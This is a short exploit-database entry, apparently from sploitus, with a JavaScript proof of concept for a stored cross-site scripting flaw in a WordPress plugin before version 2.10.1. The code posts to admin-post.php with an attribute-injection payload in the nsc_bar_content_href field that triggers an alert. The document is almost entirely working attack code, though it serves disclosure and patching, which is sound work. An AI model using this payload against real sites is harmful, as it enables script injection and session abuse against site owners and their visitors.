## https://sploitus.com/exploit?id=WPEX-ID:438C6818-CACE-410B-ACE3-325E5EA06365
On version < 2.10.1:
```
fetch("wp-admin/admin-post.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": "nsc_bar_content_href=http%3A%2F%2Fyourdomain%2Fdataprivacy%22+onmouseover%3D%22alert%28%2FXSS%2F%29",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
```